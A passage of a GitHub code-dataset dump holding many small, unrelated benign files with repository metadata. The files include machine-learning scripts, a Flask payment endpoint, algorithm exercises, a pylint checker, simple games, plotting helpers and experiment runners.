--srs - a source of the data, file path.\n# -m or --src_m - a source of the ML model description, file path. gesture_classification/stages/models/*\n# -d or --dst - output dir of the model (dir path), output name will be formed automatically:\n# .json - accuracy data, \n# .pkl - dictionary of { y_test: ... , preds: ...}, \n# .jpg - confusion matrix\n\n\nimport argparse\nimport os\nimport sys\nimport copy\nimport numpy as np\nimport pathlib\nimport json \nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\n\n# you need to install your abs path the the parent folder of modules\nsys.path.append('/home/s.gostilovich/gesture_progect/gesture_classification')\nfrom modules.models_module import create_model\nfrom modules.bullets import get_classes_dict, load_data, load_json, save_json, save_pickle, decorator_script_wrap\nfrom modules.ml_auxiliary import plot_confusion_matrix\n\n \n@decorator_script_wrap \ndef work_with_model_v2(src, m_src, dst, classes='def'):\n if classes == 'def':\n classes = get_classes_dict()\n \n data = load_data(src)\n data_tensor, data_tensor_test, y_train, y_test = data['x_train'], data['x_test'], data['y_train'], data['y_test']\n \n init_model_dict = load_json(m_src)\n \n \n model_filename = pathlib.Path(m_src).stem\n data_filename = pathlib.Path(src).stem\n ext_result = '.json'\n ext_preds = '.pkl'\n ext_fig = '.jpg'\n dst_main = os.path.join(dst, model_filename+ '-' + data_filename)\n \n \n model = create_model(init_model_dict)\n \n print(model.name + ':')\n print(model.main_dict)\n print()\n \n # train\n model.fit(data_tensor, y_train)\n fitting_time = model.fit_time\n #test\n preds = model.predict(data_tensor_test)\n print('Test acc = ', accuracy_score(y_test, preds))\n save_pickle({'preds': preds, 'y_test': y_test}, dst_main + ext_preds)\n plot_confusion_matrix(data['y_test'], preds, classes)\n plt.savefig(dst_main + ext_fig, dpi=300)\n print()\n # inferance\n inf_time = model.eval_inference_time(data_tensor_test[0:1], 100)\n print()\n # acc\n accs = model.eval_model(data_tensor, y_train, data_tensor_test, y_test)\n print(accs)\n out_dict = {'model': str(model),'accs': list(accs), 'inf_time': inf_time, 'mean_acc': accs.mean(), 'std_acc': accs.std(ddof=1),\n 'fitting_time': fitting_time}\n \n save_json(out_dict, dst_main + ext_result)\n \n return out_dict\n \n \n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-s', '--src', default=None)\n parser.add_argument('-m', '--m_src', default=None)\n \n parser.add_argument('-d', '--dst', default=None)\n # parser.add_argument('-r', '--rank', default=None,\n # help=\"For example rank='[1,2]' or rank = '1', default: None\")\n \n arg = parser.parse_args()\n \n dst = pathlib.Path(arg.dst)\n assert dst.is_dir(), f'Error! {dst} should be dirrectory'\n \n script_name = pathlib.Path(__file__).name\n \n print(f\"Start {script_name}:\")\n # script function\n work_with_model_v2(src=arg.src,m_src=arg.m_src, dst=arg.dst)\n ###\n print(f\"Finished script: {script_name}\")\n print()\n \n\nif __name__ == '__main__': \n main() ","repo_name":"GostSergei/gesture_classification","sub_path":"bullets/model_work_2.py","file_name":"model_work_2.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22458631591","text":"\"\"\"\nCreated on Thu Dec 31 04:25:24 2020\n\n@author: Jen\n\"\"\"\n\nimport cv2 as cv\nimport torchvision\n\nclass DFDC(torchvision.datasets.ImageFolder):\n def __init__(self, root, transform):\n super(DFDC, self).__init__(root, transform)\n\n def __getitem__(self, index):\n # override ImageFolder's method\n path, target = self.samples[index]\n img = cv.imread(path)\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n \n if self.transform is not None:\n sample = self.transform(image=img)['image']\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return sample, target\n\n\n","repo_name":"aides9/deepfake_video_detection","sub_path":"Dataset/DFDC.py","file_name":"DFDC.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70633575913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 23:55:13 2020\n\n@author: jorgeagr\n\"\"\"\n\nimport numpy as np\n\nclass Jacobian_LSF(object):\n \n def __init__(self, G, d, f, df):\n self.N = G.shape[1]\n self.G = G\n self.d = d\n self.f = f\n self.df = df\n return\n \n def fit(self, m_0, max_iter=10):\n ''' \n Outputs:\n m : (N+1)-array\n model weights\n m_var : (N+1)*(N+1) matrix\n covariance matrix\n '''\n d = self.d.reshape((len(self.G), 1))\n self.m = m_0\n for i in range(max_iter):\n d_i = d - self.f(self.G, self.m)\n J = self.df(self.G, self.m)\n JTJinv = np.linalg.inv(J.T @ J)\n self.m = self.m + (JTJinv @ J.T) @ d_i\n self.norm = d_i.T @ d_i\n \n d_model = self.f(self.G, self.m)\n self.m = self.m.flatten()\n r = d - d_model\n self.data_var = (r**2).sum() / (J.shape[0] - J.shape[1])\n \n self.m_cov = JTJinv * self.data_var\n self.m_std = np.sqrt(self.m_cov.diagonal())\n \n return self.m, self.m_cov\n\nG = np.array([[-6], [-2], [2]])\nd = np.array([1.6, 3, 3])\n\n# m[0] == s^2\n# m[1] == A\nf = lambda G, m: m[1] * np.exp(-G**2/(2*m[0]))\ndef df(G, m):\n J = np.zeros((len(G), len(m)))\n J[:,0] = (- G / m[0] * m[1] * np.exp(-G**2/(2*m[0]))).flatten()\n J[:,1] = (np.exp(-G**2/(2*m[0]))).flatten()\n return J\n\nmodel = Jacobian_LSF(G, d, f, df)\nm, cov = model.fit(np.array([[15], [1.5]]), 200)\n\nprint('Jacobian Fit')\nprint('s^2 = {:.4f}'.format(m[0]))\nprint('A = {:.4f}'.format(m[1]))","repo_name":"JorgeAGR/nmsu-course-work","sub_path":"GPHY560/Homework 6/prob5.py","file_name":"prob5.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12117803708","text":"import json\n\nfrom flask_cors import CORS\nfrom flask import Flask, request\nimport gateway as gateway\n\napp = Flask(__name__)\n\nCORS(app)\n\n\n@app.route('/pay/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/pay/client_token/', methods=['GET'])\ndef new_checkout():\n # app.logger.info('new_checkout(%s)' % customer_id)\n return str(gateway.generate_client_token())\n\n\n@app.route('/pay/purchase/', methods=['POST'])\ndef create_subscription():\n data = json.loads(request.data)\n app.logger.warning('create_checkout(%s)', data)\n result = gateway.subscription(data, app.logger.warning)\n app.logger.warning('create_checkout() return: %s' % result)\n\n try:\n return result.subscription.id\n except:\n return str(result), 500\n\n\nif __name__ == '__main__':\n app.run(\"0.0.0.0\", port=7000)\n","repo_name":"Gott50/pay-manager","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15123803209","text":"# def makelist(n, m):\r\n# \treturn [[0 for i in range(m)] for j in range(n)]\r\n\r\nN = int(input())\r\na = [0] + list(map(int, input().split()))\r\n\r\ndef check(n):\r\n\tb = [False]*(len(a))\r\n\tfor i in range(1, len(a)):\r\n\t\tif a[i] >= n:\r\n\t\t\tb[i] = True\r\n\t\telse:\r\n\t\t\tb[i] = False\r\n\r\n\tr = int(1e9)\r\n\tl = int(1e9)\r\n\trb = b[N]\r\n\tlb = b[N]\r\n\tfor i in range(1, N):\r\n\t\tif lb == b[N-i]:\r\n\t\t\tl = i\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tlb = b[N-i]\r\n\t\t\r\n\tfor i in range(1, N):\r\n\t\tif rb == b[N+i]:\r\n\t\t\tr = i\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\trb = b[N+i]\r\n\tif r == int(1e9) and l == int(1e9):\r\n\t\tif N % 2 == 1:\r\n\t\t\treturn b[N]\r\n\t\telse:\r\n\t\t\treturn not b[N]\r\n\telse:\r\n\t\tif r < l:\r\n\t\t\treturn rb\r\n\t\telse:\r\n\t\t\treturn lb\r\n\r\n# ?????????????\r\ndef binarySearch(small, big):\r\n\tmid = (big + small) // 2\r\n\tif big - small <= 1:\r\n\t\tif check(small): return small\r\n\t\telse: return big\r\n\telse:\r\n\t\tif not check(mid):\r\n\t\t\treturn binarySearch(small, mid)\r\n\t\telse:\r\n\t\t\treturn binarySearch(mid, big)\r\n\r\nprint(binarySearch(2, 2*N-2))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc006/D/957926.py","file_name":"957926.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"11938060595","text":"\"\"\"Checker which checks whether random seed is set in pytorch dataloader\"\"\"\nfrom pylint.interfaces import IAstroidChecker\nfrom pylint.checkers import BaseChecker\nimport astroid\n\nfrom dslinter.utils.exception_handler import ExceptionHandler\n\n\nclass RandomnessControlDataloaderPytorchChecker(BaseChecker):\n \"\"\"Checker which checks whether random seed is set in pytorch dataloader\"\"\"\n __implements__ = IAstroidChecker\n\n name = \"randomness-control-dataloader-pytorch\"\n priority = -1\n msgs = {\n \"W5512\": (\n \"The worker_init_fn() and generator is not set in PyTorch DataLoader API\",\n \"randomness-control-dataloader-pytorch\",\n \"Use worker_init_fn() and generator in PyTorch DataLoader API to preserve reproducibility\"\n )\n }\n options = ()\n\n _import_dataloader = False\n\n def visit_importfrom(self, importfrom_node: astroid.ImportFrom):\n \"\"\"\n Check whether there is DataLoader imported.\n \"\"\"\n try:\n if(\n hasattr(importfrom_node, \"modname\")\n and importfrom_node.modname == \"torch.utils.data\"\n and hasattr(importfrom_node, \"names\")\n ):\n for name, _ in importfrom_node.names:\n if name == \"DataLoader\":\n self._import_dataloader = True\n except: # pylint: disable = bare-except\n ExceptionHandler.handle(self, importfrom_node)\n\n def visit_call(self, node: astroid.Call):\n \"\"\"\n Check whether there is a rule violation.\n :param node:\n \"\"\"\n try:\n if self._use_dataloader_from_import(node) or self._use_dataloader_from_torch(node):\n # In dataloader, check if \"worker_init_fn\" and \"generator\" is set.\n keywords = []\n if hasattr(node, \"keywords\"):\n for k in node.keywords:\n if hasattr(k, \"arg\"):\n keywords.append(k.arg)\n if \"worker_init_fn\" not in keywords or \"generator\" not in keywords:\n self.add_message(\"randomness-control-dataloader-pytorch\", node=node)\n except: # pylint: disable = bare-except\n ExceptionHandler.handle(self, node)\n\n def _use_dataloader_from_import(self, node):\n # Dataloader has been imported from torch.utils.data\n if(\n self._import_dataloader is True\n and hasattr(node.func, \"name\")\n and node.func.name == \"DataLoader\"\n ):\n return True\n return False\n\n def _use_dataloader_from_torch(self, node):\n # Dataloader has not been imported from torch.utils.data\n full_expr = \"\"\n if hasattr(node, \"func\"):\n node = node.func\n while hasattr(node, \"expr\"):\n if hasattr(node, \"attrname\"):\n full_expr = node.attrname + \".\" + full_expr\n node = node.expr\n if hasattr(node, \"name\"):\n full_expr = node.name + \".\" + full_expr\n if full_expr[:-1] == \"torch.utils.data.DataLoader\":\n return True\n return False\n","repo_name":"SERG-Delft/dslinter","sub_path":"dslinter/checkers/randomness_control_dataloader_pytorch.py","file_name":"randomness_control_dataloader_pytorch.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38936385478","text":"import machine\nimport time\nimport _thread\n\n\nclass SlowWdt:\n def __init__(self, expiration_ms: int):\n self.lock = _thread.allocate_lock()\n self._start_ms: int = None\n self._expiration_ms = expiration_ms\n\n def __enter__(self):\n with self.lock:\n self._expiration_ms = expiration_ms\n self._start_ms = time.now()\n\n def __exit__(self, *exc):\n with self.lock:\n self._start_ms = None\n\n def feed(self):\n with self.lock:\n duration_ms = time.ticks_diff(time.ticks_ms(), self._start_ms)\n if duration_ms > self._expiration_ms:\n print(f\"SlowWdt() reset after {duration_ms}ms\")\n # Give time to flush print buffer\n time.sleep(0.1)\n machine.reset()\n","repo_name":"petermaerki/2023_filament_dryer_git","sub_path":"software/micropython/utils_wdt_slow.py","file_name":"utils_wdt_slow.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5542822225","text":"# 练习:随机加法考试题 2 + 10 = ?\n# 随机产生两个数字,在控制台中获取两个数相加的结果\n# 如果输入正确,得10分,如果输入错误,扣5分。\n# 总共3道题,最后输出总分.\n\n# 生成随机数的工具\nimport random\n\nscore = 0\nfor i in range(3): # 0 1 2\n # 产生一个随机数\n random_number01 = random.randint(1, 100)\n random_number02 = random.randint(1, 100)\n result = int(input(str(random_number01) + \"+\" + str(random_number02) + \"=?:\"))\n # 如果答对了\n if random_number01 + random_number02 == result:\n score += 10\n else:\n score -= 5\n\nprint(\"总分是:\" + str(score))\n","repo_name":"chang821606/storebook","sub_path":"python_base/code/day04/exercise06.py","file_name":"exercise06.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15318440848","text":"# coding=utf-8\n\nimport random\n\ndef guess_game():\n correct = False\n num_guess = 0\n print(\"Welcome to the guess game!\")\n print(\"I am thinking of a number between 1-10 and you have 3 guesses to get it!\")\n number = random.randint(0, 10)\n while not correct and num_guess < 3:\n guess = input(\"Pick a number between 1 and 10 \")\n guess = int(guess)\n if guess < number:\n print(\"that is too low!\")\n num_guess += 1\n if guess > number:\n print(\"that is too high!\")\n num_guess += 1\n if guess == number:\n correct = True\n\n if correct == False:\n print(\"Sorry! You are out of guesses. I was thinking of the number \" + str(number) + \" Better luck next time!\")\n if correct == True:\n print(\"Correct! The number was \" + str(number))\n\nguess_game()\n","repo_name":"MattCareycode/Simple-Python-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"967441582","text":"def largestRectangleArea(heights):\n\tstack = []\n\tmaxArea = 0\n\tn = len(heights)\n\n\tfor i in range(n):\n\t\twhile stack and heights[i] < heights[stack[-1]]:\n\t\t\theight = heights[stack.pop()]\n\t\t\twidth = i if not stack else i - stack[-1] - 1\n\t\t\tarea = height * width\n\t\t\tmaxArea = max(maxArea, area)\n\n\t\tstack.append(i)\n\n\twhile stack:\n\t\theight = heights[stack.pop()]\n\t\twidth = n if not stack else n - stack[-1] - 1\n\t\tarea = height * width\n\t\tmaxArea = max(maxArea, area)\n\n\treturn maxArea\n\n\nhistogram = [2, 1, 5, 6, 2, 3, 9, 9]\nprint(largestRectangleArea(histogram))","repo_name":"AffectEngine/Algorythms_Roadmap","sub_path":"2. Stack/2.7 Largest Rectangle in Histogram.py","file_name":"2.7 Largest Rectangle in Histogram.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17579824502","text":"from json import loads\nfrom argparse import ArgumentParser\nfrom csv import DictWriter\n\nparser = ArgumentParser(\"jsonl2csv\")\nparser.add_argument(\"--input\", required=True)\nparser.add_argument(\"--output\", required=True)\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n lines, keys = [], set()\n with open(args.input, \"r\") as f:\n for line in f.readlines():\n try:\n line = loads(line)\n lines.append(line)\n keys.update(line.keys())\n except:\n pass\n\n with open(args.output, \"w\") as f:\n writer = DictWriter(f, keys)\n writer.writeheader()\n for line in lines:\n writer.writerow(line)","repo_name":"csmith49/tron","sub_path":"jsonl_to_csv.py","file_name":"jsonl_to_csv.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14822305499","text":"# Owner(s): [\"oncall: jit\"]\n\nimport os\nimport sys\n\nimport torch\nfrom torch.testing import FileCheck\n\n# Make the helper files in test/ importable\npytorch_test_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(pytorch_test_dir)\nfrom torch.testing._internal.jit_utils import JitTestCase\n\nif __name__ == '__main__':\n raise RuntimeError(\"This test file is not meant to be run directly, use:\\n\\n\"\n \"\\tpython test/test_jit.py TESTNAME\\n\\n\"\n \"instead.\")\n\nclass TestFunctionalBlocks(JitTestCase):\n def test_subgraph_creation(self):\n def fn(x, y, z):\n x = x + 1\n y = y + 1\n z = z + 1\n z.add_(2)\n z = z * z\n y = y * z\n if y < 2:\n y = y + 5\n return x + y + z\n\n graph = torch.jit.script(fn).graph\n self.run_pass('create_functional_graphs', graph)\n\n # all uses of x and y should be sunk\n FileCheck().check(r\"%x\").check_not(r\"%x\").check(\"FunctionalGraph\").check(r\"%x\").run(graph)\n FileCheck().check(r\"%y\").check_not(r\"%y\").check(\"FunctionalGraph\").check(r\"%y\").run(graph)\n\n # Don't allow any outputs which escape scope, so there is one final addition in the graph\n FileCheck().check(\"Tensor = prim::Functional\").check_next(\"aten::add\").run(graph)\n\n # z + 1, z.add_(2) considered non functional, z = z * z should be considered functional\n FileCheck().check(\"add\").check(\"add_\").check_not(\"mul\").check(\"FunctionalGraph\").run(graph)\n","repo_name":"pytorch/pytorch","sub_path":"test/jit/test_functional_blocks.py","file_name":"test_functional_blocks.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"38769344548","text":"# codeholic's FuseFinder script v0.2.0\n# Creates a new layer called \"FuseTestLayer\"\n# Writes to a FuseFinder subfolder in Golly's data directory.\n# Updates screen every hundred trials (why not?)\n# Uses g.new() as per simsim314's suggestion\n# (I noticed that Golly's Undo got very slow after running the old script) (?)\n# hashsoup used instead randfill\n# report to patterns folder\n#SEED for datetime.now\nimport golly as g\nimport os\nimport time\nimport hashlib\nimport datetime\nimport itertools\nimport math\n\nMAX_FUSE_PACE = 10 # how many ticks it takes to burn one cell\nMAX_FUSE_LENGTH = 1000 # how long the test fuse is\nMAX_IGNITION_TIME = 1000 # how long we wait for a fuse to be ignited\nBASE = 16\n\nstep = int(math.log(MAX_FUSE_PACE * MAX_FUSE_LENGTH + MAX_IGNITION_TIME, BASE) + 0.5)\n\noutpath=os.path.join(g.getdir(\"patterns\"),\"FuseFinder\")\nif not os.path.isdir(outpath): os.mkdir(outpath)\n\nFUSENAME = \"Diagpuffer\"\n\nselrect = g.getselrect()\nif not selrect:\n g.exit('Select a fuse monomer.')\n\nmonomer = g.getcells(selrect)\nif not monomer:\n g.exit('Selected region is empty.')\n\noffset = int(g.getstring(\"Enter horizontal offset:\", \"0\"))\n\nseed = g.getstring(\"Enter soup seed:\", str(datetime.datetime.now()))\n\nfor i in range(g.numlayers()):\n if g.getname(i)==\"FuseTestLayer\":\n r=g.getrect()\n if r is not []:\n g.select(r)\n g.clear(0)\n break\nif not g.getname(i)==\"FuseTestLayer\": g.addlayer()\n\ng.setalgo('QuickLife')\n\nx0, y0, width, height = selrect\nfor dx, dy in zip((i * offset for i in itertools.count(0)), range(0, MAX_FUSE_LENGTH, height)):\n g.putcells(monomer, dx, -dy)\n\nTESTRECT = [x0 + dx, y0 - dy, width, height]\n\nallcells=g.getcells(g.getrect())\ncells = g.getcells(TESTRECT)\n\nSOUP_SIZE = 16\nSOUPSPERDISPLAY = 100\n\ndef hashsoup(instring):\n s = hashlib.sha256(instring).digest()\n thesoup = []\n for j in xrange(32):\n t = ord(s[j])\n for k in xrange(8):\n if (t & (1 << (7 - k))):\n thesoup.append(k + 8*(j % 2))\n thesoup.append(int(j / 2))\n\n return thesoup\n\ndef patterns_identical(cells1, cells2):\n if len(cells1) != len(cells2):\n return False\n return set(zip(cells1[::2], cells1[1::2])) == set(zip(cells2[::2], cells2[1::2]))\n\ncount, found = 0, 0\n\nstart_time = time.clock()\n\n# For profiling\n#\n#init_time = 0\n#gen_time = 0\n#check_time = 0\n\n\nwhile True:\n #mark = time.clock()\n g.new(\"FuseTestLayer\")\n g.putcells(allcells)\n g.putcells(hashsoup(seed + str(count)), x0 + (width - SOUP_SIZE) / 2, y0 + height)\n #init_time += time.clock()-mark\n #mark = time.clock()\n g.setbase(BASE)\n g.setstep(step)\n\n #gen_time +=time.clock()-mark\n #mark = time.clock()\n changed = True\n for _ in range(0, 2):\n g.step()\n test = g.getcells(TESTRECT)\n if patterns_identical(test, cells):\n changed = False\n break\n\n count += 1\n\n if changed:\n g.reset()\n g.save(os.path.join(outpath, FUSENAME + str(count) + '.rle'), 'rle')\n g.show(\"Saved fuse to \" + outpath + FUSENAME + str(count) + \".rle\")\n found += 1\n\n if count % SOUPSPERDISPLAY == 0:\n end_time =time.clock()\n g.show('Count:' + str(count) + ' Found:' + str(found) + ' (' +\\\n str(round(SOUPSPERDISPLAY/(end_time - start_time), 2)) + \" soups per second)\")\n #g.show('init: '+str(init_time*1000/count)+'ms gen: '+str(gen_time*1000/count)+'ms check: '+str(check_time*1000/count)+'ms')\n start_time = end_time\n g.setmag(2)\n g.update()\n #check_time += time.clock()-mark\n","repo_name":"conwaylife/fuse-finder","sub_path":"fuse-finder.py","file_name":"fuse-finder.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42912638568","text":"from exec_utilities import time_out_util\nfrom exec_utilities.exec_utils import *\n\n\ndef run_exp():\n our_exec_path = '/homes/ywangby/workspace/yche/new-git-repos-yche/SimRank/SPS-Variants/READS/build'\n data_set_lst = [\n # 'ca-GrQc', 'ca-HepTh', 'p2p-Gnutella06', 'wiki-Vote',\n # 'email-Enron', 'email-EuAll', 'web-NotreDame', 'web-Stanford',\n # 'web-BerkStan', 'web-Google',\n # 'cit-Patents', 'soc-LiveJournal1',\n # 'wiki-Link',\n 'digg-friends',\n 'flickr-growth',\n ]\n dynamic_exec_tag_lst = [\n 'reads-rq-dynamic-del',\n 'reads-rq-dynamic-exp',\n # 'reads-d-dynamic-del',\n # 'reads-d-dynamic-exp',\n ]\n\n def one_round():\n for exec_name in dynamic_exec_tag_lst:\n for data_set_name in data_set_lst:\n algorithm_path = our_exec_path + os.sep + exec_name\n statistics_file_path = 'exp_results/' + exec_name + '_dynamic_update_time_' + str(\n insert_edge_num) + '_0407.txt'\n params_lst = map(str, [algorithm_path, data_set_name, '>>', statistics_file_path])\n cmd = ' '.join(params_lst)\n time_out = 72000\n tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out)\n write_split(statistics_file_path)\n\n with open(statistics_file_path, 'a+') as ifs:\n ifs.write(correct_info)\n ifs.write(my_splitter + time.ctime() + my_splitter)\n ifs.write('is_time_out:' + str(tle_flag))\n ifs.write('\\n\\n\\n\\n')\n\n insert_edge_num = 1000\n one_round()\n\n\nif __name__ == '__main__':\n run_exp()\n","repo_name":"RapidsAtHKUST/SimRank","sub_path":"python_experiments/run_vldbj_experiments/run_reads_dynamic_update.py","file_name":"run_reads_dynamic_update.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"10658532423","text":"class Entity:\n \"\"\"\n A generic entity object. Entities are anything that is interact-able that isn't the map itself.\n\n Examples: Players, enemies, items, etc.\n \"\"\"\n def __init__(self, x, y, char, color, name):\n self.x = x\n self.y = y\n self.char = char\n self.color = color\n self.name = name\n","repo_name":"ali-imad/TowerOfElbiz","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37787037065","text":"#3 Класс-исключение для контроля типа данных элемента списка\nclass OwnError(Exception):\n def __init__(self, txt):\n self.txt = txt\n\nlist = []\na = input(\"Введите число: \")\nwhile a != 'stop':\n try:\n if a.isdigit():\n list.append(a)\n else:\n raise OwnError('Нужно вводить только числа!')\n except OwnError as err:\n print(err)\n finally:\n a = input(\"Введите число: \")\n\nprint(list)\n\n\n\n\n","repo_name":"GladkovArtem/GB_Gladkov_Artem","sub_path":"DZ11_3_Gladkov_Artem.py","file_name":"DZ11_3_Gladkov_Artem.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17029740926","text":"import graph_tool as gt\n\ndef int_conv(n):\n lead = n.find('-', 8)\n num = int(n[8:lead])*10000\n num += int(n[lead+1:])\n return num\n\nf = open('edges.txt', 'r')\ng = gt.Graph(directed=True)\n\nfor line in f:\n u,v = line.split('\\t')\n u = int_conv(u)\n v = int_conv(v)\n g.add_edge(u,v)\n g.add_edge(v,u)\n\ng.save('favites.gt')\n\n","repo_name":"reyna-abhyankar/missing-nodes-covid","sub_path":"favites_pkl/favites_to_gt.py","file_name":"favites_to_gt.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8438865468","text":"from sys import stdin\n\ndef reverse_string(string):\n '''Function will return reverse string.'''\n return string[::-1]\n\n\ndef only_alphanum_string(string):\n '''Function will return only alpha-numeric string.'''\n new_str = ''\n for i in string:\n if i.isalnum():\n new_str += i\n return new_str\n\n \ndef is_palindrom(string):\n '''Function will check the string is palindrome or not.'''\n alpha_numeric_string = only_alphanum_string(string)\n rev_str = reverse_string(string)\n if alpha_numeric_string == rev_str:\n return 'true'\n else:\n return 'false'\n\n\n# Driver Code\nif __name__ == '__main__':\n string = input().strip()\n result = is_palindrom(string)\n print(result)","repo_name":"Sam21sop/Coding_Ninjas_2023","sub_path":"00_Career_Camp_Introduction_To_Python/12_String/StringPalindrome.py","file_name":"StringPalindrome.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36150669804","text":"#!/usr/bin/env python\n\n# Plotting imports\nimport matplotlib.pylab as pylab\nfrom matplotlib.font_manager import FontProperties\n# Logging imports\nimport logging\n\nclass BarChart:\n\n def __init__(self):\n # Appearance variables\n self._font = {'family':'serif', 'color':'black', 'weight':'normal', 'size':'12',}\n self._colors = 'rgbcmyk'\n # Labels\n self._title = 'Figure'\n self._xLabel = 'X-Axis'\n self._yLabel = 'Y-Axis'\n self._saveName = 'fig.png'\n self._saveFig = False\n # Data\n self._xData = {}\n self._yData = {}\n self._categoryData = {}\n # Legend\n self._usingLegend = False\n self._legendTitle = ''\n self._legendLocation = 'center right'\n self._legendLabelSpacing = 0.0\n self._legendFontProp = FontProperties()\n self._legendBboxToAnchor = None\n self._logger = logging.getLogger('Plot_Logger')\n self._logger.addHandler(logging.StreamHandler())\n self._logger.debug('Finished BarChart __init__()')\n\n def setColors(self, colors):\n self._colors = colors\n self._logger.debug('Setting bar colors')\n\n def setLogLevel(self, logLevel):\n self._logger.setLevel(logLevel)\n\n def setLegend(self, legendTitle='Legend', legendLocation='center top',\n labelspacing=0.0, fontProp=FontProperties(), bbox_to_anchor=None):\n self._usingLegend = True\n self._legendTitle = legendTitle\n self._legendLocation = legendLocation\n self._legendLabelSpacing = labelspacing\n self._legendFontProps = fontProp\n self._legendBboxToAnchor = bbox_to_anchor\n self._logger.debug('Set legend parameters')\n\n def setFont(self, font):\n self._font = font\n self._logger.debug('Setting font')\n\n def setXData(self, xData):\n self._xData = xData\n self._logger.debug('Setting x-data')\n\n def setYData(self, yData):\n self._yData = yData\n self._logger.debug('Setting y-data')\n\n def setCategoryData(self, categoryData):\n self._categoryData = categoryData\n self._logger.debug('Setting category data')\n\n def setData(self, xData, yData, categoryData):\n self.setXData(xData)\n self.setYData(yData)\n self.setCategoryData(categoryData)\n self._logger.debug('Setting x, y and category data')\n\n def setTitle(self, title):\n self._title = title\n self._logger.debug('Setting plot title')\n\n def setXLabel(self, xLabel):\n self._xLabel = xLabel\n self._logger.debug('Setting x-axis label')\n\n def setYLabel(self, yLabel):\n self._yLabel = yLabel\n self._logger.debug('Setting y-axis label')\n\n def setTitleAndLabels(self, title, xLabel, yLabel):\n self.setTitle(title)\n self.setXLabel(xLabel)\n self.setYLabel(yLabel)\n self._logger.debug('Setting title and axis labels')\n\n def setSaveName(self, saveName):\n self._saveName = saveName\n self._logger.debug('Setting save name')\n\n def savePlotAs(self, imageName):\n self.setSaveName(imageName)\n self._saveFig = True\n\n def readyToPlot(self):\n if (self._xData == {} or self._yData == {} or self._categoryData == {}):\n return False\n else:\n return True\n\n def plot(self):\n self._logger.debug('plotting')\n colors = self._colors[:(len(self._categoryData))]\n ind = pylab.arange(len(self._xData))\n bar_width = 1.0 / (len(self._categoryData) + 1)\n bar_groups = []\n\n for c in range(len(self._categoryData)):\n bars = pylab.bar(ind+c*bar_width, self._yData[c], bar_width, color=colors[c % len(colors)])\n bar_groups.append(bars)\n\n pylab.xticks(ind+bar_width, self._xData)\n if (self._usingLegend):\n pylab.legend((b[0] for b in bar_groups), self._categoryData,\n title = self._legendTitle, loc = self._legendLocation,\n labelspacing = self._legendLabelSpacing, \n prop = self._legendFontProps, bbox_to_anchor = self._legendBboxToAnchor)\n\n pylab.xlabel(self._xLabel, fontdict=self._font)\n pylab.ylabel(self._yLabel, fontdict=self._font)\n pylab.title(self._title, fontdict=self._font)\n if(self._saveFig):\n self._logger.debug('Saving plot as {}'.format(self._saveName))\n pylab.savefig(self._saveName)\n\n pylab.show()\n","repo_name":"petevieira/ns3-sims","sub_path":"scripts/pvplot.py","file_name":"pvplot.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3920601588","text":"import os\nimport 